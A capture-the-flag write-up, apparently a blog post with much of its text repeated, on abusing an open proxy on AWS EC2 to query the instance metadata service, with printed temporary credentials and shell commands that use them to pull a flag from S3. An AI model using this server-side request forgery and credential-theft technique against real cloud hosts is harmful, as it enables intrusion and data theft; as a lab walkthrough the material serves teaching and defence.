StartCon 2016 CTF - AWS EC2 / S3 Writeup
Thanks to & the sponsors behind the inaugural StartCon Capture the Flag competition.
The Farming Simulator 2016 (CTF chapter of the Platypus community) teams took out 1st, 2nd, 3rd & (5th?) places. Or as we'd rather term it, we performed a successful DoS of prizes to other teams. A large percentage of the winnings will be used responsibly on shit like a giant inflatable platypus.
Also a big thank you to Michael Foley, who I believe ran his first CTF this weekend. From running Platypus Con's CTF, I know how hard this shit is, so good work man. I had a lot of fun. Keep 'em coming.
Credit for the "thought leadership" in the writeup goes to @infosec_au. If you'd like to say thank you, maybe shoot his charity, Hackers Helping Hackers, a few dollars, or dump any spare conference tickets on them to forward to students or fellow hackers in need.
The two flags I grabbed for my team (to come second by a comfortable margin ;)) were:
The only thing I can say here is, as a security professional, you need to be where your "customers" are- as much as I love a good ROP chain, sometimes the best hacks, aren't.
Where the input paramerter (in this case Google) is the page we want to go to.
We're also told the location of the flag is at:
Cool, so we just grab the flag through the proxy?
Nope. Ok, what about accessing the bucket through the hostname?
Nope. Okay, is it a:
The nice thing about having a mate who happens to be a core developer on a project like Flynn is that you learn about this shit over the dinner table. It's a local network metadata API which will return information about the host you're "on," designed to be leveraged by automation tools which allow host base images to be stateless.
So lets try that.
{ "Code" : "Success", "LastUpdated" : "2016-11-27T03:14:23Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIAIW2CALQDG2IEWNVQ", "SecretAccessKey" : "Uv7g55nbslN3AiigVSF0I4g4Tz18iT3fVZinA/gT", "Token" : "FQoDYJKFDSF//////////wEaDGL2HzBdaajmZblahblahblahloadsoftokenyougetthepoint", "Expiration" : "2016-11-27T09:29:45Z" }
Double Nice.
Without going into more detail here, you can quite quickly see how this meta-data API is useful. There's also a user-data API which typically gets used by developers and devops to have stateless images. You can typically find keys, runtime variables, sometimes even entire scripts in here.
bash-4.4$ export AWS_SECRET_ACCESS_KEY=Uv7g55nbslN3AiigVSF0I4g4Tz18iT3fVZinA/gT
bash-4.4$ export AWS_SECURITY_TOKEN=FQoDYJDSF//////////wEaDGL2Zblahblahblahloadsoftokenyougetthepoint
bash-4.4$ aws s3 cp s3://startcon-ctf/11/flag.txt .
download: s3://startcon-ctf/11/flag.txt to ./flag.txt
bash-4.4$ cat flag.txt
If you enjoyed this, recommend you check out Dagrz's aws_pwn repo. Has some great resources and tooling for pwning in AWS.
Happy Hunting.
The Farming Simulator 2016 (CTF chapter of the Platypus community) teams took out 1st, 2nd, 3rd & (5th?) places. Or as we'd rather term it, we performed a successful DoS of prizes to other teams. A large percentage of the winnings will be used responsibly on shit like a giant inflatable platypus.
Also a big thank you to Michael Foley, who I believe ran his first CTF this weekend. From running Platypus Con's CTF, I know how hard this shit is, so good work man. I had a lot of fun. Keep 'em coming.
Credit for the "thought leadership" in the writeup goes to @infosec_au. If you'd like to say thank you, maybe shoot his charity, Hackers Helping Hackers, a few dollars, or dump any spare conference tickets on them to forward to students or fellow hackers in need.
The two flags I grabbed for my team (to come second by a comfortable margin ;)) were:
- A GitLab arbitrary file disclosure vulnerability
- Doesn't really need a write-up thanks to a fantastic HackerOne report here
- This was a big lesson- not all vulnerabilities have high profile CVEs. Some just sit in HackerOne reports... :)
- The "open proxy" on EC2
Let me start by saying I love how this challenge was put together. It's simple, yet stumped quite a lot of people (probably through its sheer simplicity). To be fair, it requires knowledge of the Amazon Web Services (AWS) platform, which not an awful lot of hackers have.The only thing I can say here is, as a security professional, you need to be where your "customers" are- as much as I love a good ROP chain, sometimes the best hacks, aren't.
The Challenge
We're provided with a web service, which appears to run some sort of web proxy. It's accessed in this kind of form:
Where the input paramerter (in this case Google) is the page we want to go to.
We're also told the location of the flag is at:
Cool, so we just grab the flag through the proxy?
Nope. Ok, what about accessing the bucket through the hostname?
Nope. Okay, is it a:
File stored on the local server?Nope.What about on itself? like or localhost?Nope.Some vuln with the input field?Fuzzed and nope.
Part I: The AWS EC2 Information Disclosure API
A not-too-well-known gem of the EC2 platform is this guy:
The nice thing about having a mate who happens to be a core developer on a project like Flynn is that you learn about this shit over the dinner table. It's a local network metadata API which will return information about the host you're "on," designed to be leveraged by automation tools which allow host base images to be stateless.
So lets try that.
{ "Code" : "Success", "LastUpdated" : "2016-11-27T03:14:23Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIAIW2CALQDG2IEWNVQ", "SecretAccessKey" : "Uv7g55nbslN3AiigVSF0I4g4Tz18iT3fVZinA/gT", "Token" : "FQoDYJKFDSF//////////wEaDGL2HzBdaajmZblahblahblahloadsoftokenyougetthepoint", "Expiration" : "2016-11-27T09:29:45Z" }
Double Nice.
Without going into more detail here, you can quite quickly see how this meta-data API is useful. There's also a user-data API which typically gets used by developers and devops to have stateless images. You can typically find keys, runtime variables, sometimes even entire scripts in here.
Part II: Capture the Swag
From here it's pretty straight forward to steal the flag.bash-4.4$ export AWS_ACCESS_KEY_ID=ASIAIW2CALQDG2IEWNVQ
bash-4.4$ export AWS_SECRET_ACCESS_KEY=Uv7g55nbslN3AiigVSF0I4g4Tz18iT3fVZinA/gT
bash-4.4$ export AWS_SECURITY_TOKEN=FQoDYJDSF//////////wEaDGL2Zblahblahblahloadsoftokenyougetthepoint
bash-4.4$ aws s3 cp s3://startcon-ctf/11/flag.txt .
download: s3://startcon-ctf/11/flag.txt to ./flag.txt
bash-4.4$ cat flag.txt
If you enjoyed this, recommend you check out Dagrz's aws_pwn repo. Has some great resources and tooling for pwning in AWS.
Happy Hunting.
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